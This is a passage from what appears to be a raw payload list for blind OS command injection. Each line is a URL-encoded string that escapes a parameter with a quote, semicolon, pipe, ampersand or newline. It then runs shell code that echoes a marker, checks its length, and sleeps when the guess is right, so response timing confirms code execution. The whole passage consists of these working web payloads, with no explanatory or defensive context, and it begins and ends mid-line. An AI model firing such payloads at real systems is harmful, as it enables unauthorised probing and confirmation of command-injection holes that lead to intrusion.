4%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%27%7C%20%5B%201%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%202%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%203%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%204%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%205%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%206%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%207%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%208%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%7C%20%5B%209%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%27%7C%20%5B%201%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%202%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%203%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%204%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%205%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%206%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%207%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%208%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%7C%20%5B%209%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%0A%20str%3D%24%28echo%20LMRVVK%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%27%7C%20%5B%201%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%202%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%203%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%204%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%205%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%206%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%207%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%208%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%7C%20%5B%209%20-ne%20%24%28echo%20YGAAWQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DPWDWF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%28echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%3B%20str%3D%24%2